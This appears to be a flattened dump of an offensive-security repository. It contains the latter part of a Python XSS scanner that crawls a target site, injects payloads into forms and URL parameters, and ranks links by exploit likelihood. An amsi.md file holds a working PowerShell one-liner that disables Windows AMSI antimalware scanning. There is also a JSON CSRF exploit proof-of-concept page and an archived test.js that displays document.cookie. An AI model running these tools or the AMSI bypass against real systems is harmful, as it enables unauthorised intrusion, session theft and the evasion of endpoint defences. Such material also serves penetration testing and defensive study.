probability 110 | def sortPayload(payload, report, override = False): 111 | if payload in payloads[:2] or override: 112 | highProbLinks.append(report) 113 | elif payload == payloads[2]: 114 | lowProbLinks.append(report) 115 | else: 116 | medProbLinks.append(report) 117 | 118 | def testPayload(payload, p, link): 119 | br.form[str(p.name)] = payload 120 | br.submit() 121 | # if payload is found in response, we have XSS 122 | if payload in br.response().read(): 123 | #color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!') 124 | report = 'Link: %s, Payload: %s, Element: %s' % (str(link), 125 | payload, str(p.name)) 126 | # Test for href= and src="javascript:alert()" which is xss, most other links with 127 | # javascript:alert() are not good 128 | if payload == payloads[2]: 129 | srcCheck = "src=\"" + payload + "\"" 130 | hrefCheck = "href=\"" + payload + "\"" 131 | if srcCheck in br.response().read() or hrefCheck in br.response().read(): 132 | sortPayload(payload, report, True) 133 | else: 134 | sortPayload(payload, report) 135 | else: 136 | sortPayload(payload, report) 137 | 138 | 139 | xssLinks.append(report) 140 | br.back() 141 | 142 | def testURL(payload, element, link): 143 | # if payload is found in response, we have XSS 144 | if payload in br.response().read(): 145 | #color.log(logging.DEBUG, color.BOLD + color.GREEN, 'XSS found!') 146 | report = 'Link: %s, Payload: %s, Url Element: %s' % (str(link), 147 | payload, element) 148 | if payload == payloads[2]: 149 | srcCheck = "src=\"" + payload + "\"" 150 | hrefCheck = "href=\"confirm" + payload + "\"" 151 | if srcCheck in br.response().read() or hrefCheck in br.response().read(): 152 | sortPayload(payload, report, True) 153 | else: 154 | sortPayload(payload, report) 155 | else: 156 | sortPayload(payload, report) 157 | 158 | xssLinks.append(report) 159 | br.back() 160 | 161 | 162 | def initializeAndFind(): 163 | 164 | if not results.url: # if the url has been passed or not 165 | #color.log(logging.INFO, color.GREEN, 'Url not provided correctly') 166 | return [] 167 | 168 | firstDomains = [] # list of domains 169 | allURLS = [] 170 | allURLS.append(results.url) # just one url at the moment 171 | largeNumberOfUrls = [] # in case one wants to do comprehensive search 172 | 173 | # doing a short traversal if no command line argument is being passed 174 | #color.log(logging.INFO, color.GREEN, 'Doing a short traversal.') 175 | interface("Executing Short Traversal", "N/A", "N/A", -1, -1) 176 | for url in allURLS: 177 | smallurl = str(url) 178 | # Test HTTPS/HTTP compatibility. Prefers HTTPS but defaults to 179 | # HTTP if any errors are encountered 180 | # Removed the www from the link as that was causing issues with sites 181 | # not being served out of www 182 | # Also allows for the user to search for subdomains as well to be more precise 183 | try: 184 | test = httplib.HTTPSConnection(smallurl) 185 | test.request("GET", "/") 186 | response = test.getresponse() 187 | if (response.status == 200) | (response.status == 302): 188 | url = "https://" + str(url) 189 | elif response.status == 301: 190 | loc = response.getheader('Location') 191 | url = loc.scheme + '://' + loc.netloc 192 | else: 193 | url = "http://" + str(url) 194 | except: 195 | url = "http://" + str(url) 196 | try: 197 | if results.cookies: 198 | br.open(url) 199 | #color.log(logging.INFO, color.BLUE, 200 | # 'Adding cookie: %s' % cookie) 201 | # Attempt to add cookies to the session 202 | with open(results.cookies) as f: 203 | data = json.load(f) 204 | 205 | for cookie in data: 206 | name = cookie['name'] 207 | value = cookie['value'] 208 | br.set_cookie(name + "=" + value + "; expires=Wednesday, 08-Aug-19 10:40:40 GMT;") 209 | 210 | br.open(url) 211 | #color.log(logging.INFO, color.GREEN, 212 | # 'Finding all the links of the website ' + str(url)) 213 | firstDomains.append(str(url)); # add the original link itself 214 | for link in br.links(): # finding the links of the website 215 | if smallurl in str(link.absolute_url): 216 | firstDomains.append(str(link.absolute_url)) 217 | firstDomains = list(set(firstDomains)) 218 | except: 219 | pass 220 | #color.log(logging.INFO, color.GREEN, 221 | # 'Number of links to test are: ' + str(len(firstDomains))) 222 | if results.compOn: 223 | interface("Executing Comprehensive Traversal -- This may take a while", "N/A", "N/A", len(firstDomains), -1) 224 | for link in firstDomains: 225 | try: 226 | br.open(link) 227 | # going deeper into each link and finding its links 228 | for newlink in br.links(): 229 | if smallurl in str(newlink.absolute_url): 230 | largeNumberOfUrls.append(newlink.absolute_url) 231 | except: 232 | pass 233 | firstDomains = list(set(firstDomains + largeNumberOfUrls)) 234 | #color.log(logging.INFO, color.GREEN, 235 | # 'Total Number of links to test have become: ' + 236 | # str(len(firstDomains))) # all links have been found 237 | 238 | return firstDomains 239 | 240 | # Removes links that are similar but have different variable values 241 | # ex: https://a.com?value=55 and https://a.com?value=77 242 | # Useless to test both as they will produce similar results 243 | def trimLinks(firstDomains): 244 | interface("Removing duplicate urls", "N/A", "N/A", len(firstDomains), -1) 245 | polishedLinks = set() 246 | trimmedLinks = [] 247 | 248 | for url in firstDomains: 249 | if '?' in str(url): 250 | polishedUrl = url 251 | query = str(url).split("?")[1] #Get the arguments 252 | elements = query.split('&') #Split by each argument 253 | for element in elements: 254 | polishedElement = element.split('=')[0] 255 | polishedUrl = polishedUrl.replace(element, polishedElement + '=xxx') #Replace each argument value 256 | #with a constant 257 | lenBefore = len(polishedLinks) #Check the length before adding to set 258 | polishedLinks.add(polishedUrl) #Add the polished url to the set 259 | if lenBefore != len(polishedLinks): #If length of set does not go up we know that the link is duplicate 260 | trimmedLinks.append(url) 261 | elif '#' in str(url): 262 | polishedUrl = url 263 | query = str(url).split("#")[1] #Repeat code because functions are not as fun as a shit load of code 264 | polishedUrl = polishedUrl.replace(query,"xxx") 265 | 266 | lenBefore = len(polishedLinks) 267 | polishedLinks.add(url) 268 | if lenBefore != len(polishedLinks): 269 | trimmedLinks.append(url) 270 | else: 271 | lenBefore = len(polishedLinks) 272 | polishedLinks.add(url) 273 | if lenBefore != len(polishedLinks): 274 | trimmedLinks.append(url) 275 | trimmedLinks = list(trimmedLinks) 276 | return trimmedLinks 277 | 278 | def listVulnLinks(): 279 | if len(xssLinks) > 0: 280 | sys.stdout.flush() 281 | # print all xss findings 282 | if len(highProbLinks) > 0: 283 | sys.stdout.write(color.RED + color.BOLD + 'The following links have high probability of exploit:' + color.END + '\n') 284 | for link in highProbLinks: 285 | sys.stdout.write(color.RED + ' ' + link + color.END + "\n") 286 | 287 | if len(medProbLinks) > 0: 288 | sys.stdout.write(color.YELLOW + color.BOLD + 'The following links have medium probability of exploit:' + color.END + '\n') 289 | for link in medProbLinks: 290 | sys.stdout.write(color.YELLOW + ' ' + link + color.END + "\n") 291 | 292 | if len(lowProbLinks) > 0: 293 | sys.stdout.write(color.GREEN + color.BOLD + 'The following links have low probability of exploit:' + color.END + '\n') 294 | for link in lowProbLinks: 295 | sys.stdout.write(color.GREEN + ' ' + link + color.END + "\n") 296 | else: 297 | sys.stdout.flush() 298 | sys.stdout.write(color.YELLOW + 'No vulnerable links detected' + color.END + "\n") 299 | 300 | def findxss(firstDomains): 301 | # starting finding XSS 302 | interface("Started Finding XSS", "N/A", "N/A", len(firstDomains), -1) 303 | #color.log(logging.INFO, color.GREEN, 'Started finding XSS') 304 | if firstDomains: # if there is atleast one link 305 | count = 0 # Keep track of what url we are on 306 | for link in firstDomains: 307 | interface("Started Finding XSS", str(link), "N/A", len(firstDomains), count) 308 | count += 1 309 | blacklisted = False 310 | y = str(link) 311 | #color.log(logging.DEBUG, color.YELLOW, str(link)) 312 | for ext in blacklist: 313 | if ext in y: 314 | blacklisted = True 315 | break 316 | if not blacklisted: 317 | try: # Section to change to also test in url and not just forms 318 | # Currently we miss a large portion of vulnerabilites -- xss-game only gets first level 319 | # Apparently it cant recognize the form tag 320 | br.open(str(link)) # open the link 321 | if br.forms(): # if a form exists, submit it 322 | for form_num in range(0,len(br.forms())): # Added so that we explore all forms not just the first one 323 | params = list(br.forms())[form_num] # our form 324 | br.select_form(nr=form_num) # submit the first form 325 | for p in params.controls: 326 | par = str(p) 327 | # submit only those forms which require text 328 | if 'TextControl' in par: 329 | interface("Started Finding XSS", str(link), str(p.name), len(firstDomains), count) 330 | #color.log(logging.DEBUG, color.YELLOW, 331 | # '\tParam: ' + str(p.name)) 332 | for item in payloads: 333 | testPayload(item, p, link) 334 | except: 335 | pass 336 | # Test for xss in the url only if the flag specifies it 337 | if results.url_check: 338 | try: 339 | # Custom script to test xss in url that is not a form 340 | # Check that the element name is not p.name since that was 341 | # a form that we already tested 342 | if '?' in str(link): #If the link has ? then we know the possiblility of input being placed in dom is good 343 | url_args = str(link).split("?")[1] 344 | elements = url_args.split("&") 345 | for assignment in elements: # Get each element and test it for xss 346 | expression = assignment.split("=") 347 | if len(expression) < 2: 348 | continue 349 | # Get the element and value 350 | element = expression[0] 351 | value = expression[1] 352 | interface("Started Finding XSS", str(link), element, len(firstDomains), count) 353 | # Test out all of our payloads by appending them to the original value 354 | for item in range(0,len(urlpayloads)): 355 | if item == urlpayloads[2]: #Javascript:alert() needs to be on its own since it can only be used by itself 356 | br.open(str(link).replace(assignment, element + '=' + urlpayloads[item])) 357 | else: 358 | br.open(str(link).replace(assignment, element + '=' + value + urlpayloads[item])) 359 | testURL(payloads[item], element, link) 360 | 361 | # Custom build to check for values after # 362 | if '#' in str(link): 363 | for item in range(0,len(urlpayloads)): 364 | interface("Started Finding XSS", str(link), "#", len(firstDomains), count) 365 | br.open(str(link) + urlpayloads[item]) 366 | testURL(payloads[item], "#", link) 367 | except: 368 | pass 369 | 370 | interface("Finished Finding XSS", "N/A", "N/A", len(firstDomains), len(firstDomains)) 371 | listVulnLinks() 372 | else: 373 | sys.stdout.flush() 374 | sys.stdout.write(color.RED + color.BOLD + 'No link found, exiting' + color.END + "\n") 375 | 376 | 377 | # calling the function 378 | firstDomains = trimLinks(initializeAndFind()) 379 | #firstDomains = initializeAndFind() 380 | findxss(firstDomains) 381 | -------------------------------------------------------------------------------- /amsi.md: -------------------------------------------------------------------------------- 1 | ``` 2 | $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); 3 | ``` 4 | -------------------------------------------------------------------------------- /json_CSRF.html: -------------------------------------------------------------------------------- 1 | 2 | JSON CSRF Exploit POC 3 | 4 | 5 |
6 |

JSON CSRF Exploit POC

7 | 8 | 13 | 14 | 15 |
16 | 17 | 18 | 19 | -------------------------------------------------------------------------------- /test.js: -------------------------------------------------------------------------------- 1 | var _____WB$wombat$assign$function_____ = function(name) {return (self._wb_wombat && self._wb_wombat.local_init && self._wb_wombat.local_init(name)) || self[name]; }; 2 | if (!self.__WB_pmw) { self.__WB_pmw = function(obj) { this.__WB_source = obj; return this; } } 3 | { 4 | let window = _____WB$wombat$assign$function_____("window"); 5 | let self = _____WB$wombat$assign$function_____("self"); 6 | let document = _____WB$wombat$assign$function_____("document"); 7 | let location = _____WB$wombat$assign$function_____("location"); 8 | let top = _____WB$wombat$assign$function_____("top"); 9 | let parent = _____WB$wombat$assign$function_____("parent"); 10 | let frames = _____WB$wombat$assign$function_____("frames"); 11 | let opener = _____WB$wombat$assign$function_____("opener"); 12 | 13 | document.write ("This is remote text via xss.js located at ha.ckers.org " + document.cookie); 14 | alert ("This is remote text via xss.js located at ha.ckers.org " + document.cookie); 15 | 16 | 17 | } 18 | --------------------------------------------------------------------------------